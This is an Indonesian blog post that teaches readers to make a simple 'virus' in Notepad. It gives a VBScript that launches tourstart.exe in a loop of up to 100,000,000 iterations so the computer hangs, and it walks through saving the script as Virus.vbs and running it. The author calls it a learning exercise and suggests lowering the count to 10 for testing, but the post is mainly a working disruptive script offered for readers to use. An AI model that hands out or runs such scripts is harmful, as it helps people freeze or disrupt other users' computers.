twitter
    Thanks for visiting my blog don forget to follow Me :)

Belajar Bikin virus Sederhana Dengan Notepad

            Wah ni die ni gan, postingan yang ane demen,, heheh  gue pengen banget bisa bikin berbagai macam virus .yah itung buat memahamin semua jenis virus terus ngembangin sukur sukur bisa bikin antivirus sendiri .. wow .. keren yekan ? :D
             oia tips bikin virus ini ane dapet dari blog indocracker.. heheh yah nyuri" ilmu dikit ga ada salahnya kan?  ^_^\m/
virus ini udeh ane coba .. dan masih bisa ane atasi :D 

1 . Virus Notepad 1 :

a. buka notepad
b. ketik code kaya di bawah ini :

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next

 c. terus di save as , dan kasih nama Virus.vbs

xxx : warning , kalo emang mao dicoba / sebelom dibuka virusnya "GANTI ANGKA 100000000 jadi 10 . buat experimen aja.. jadi nanti tourstart.exenya ga kebanyakan munculnya sebelum komputer jadi hang ... siip vix  deh buat virus 1 .

0 comments:

Posting Komentar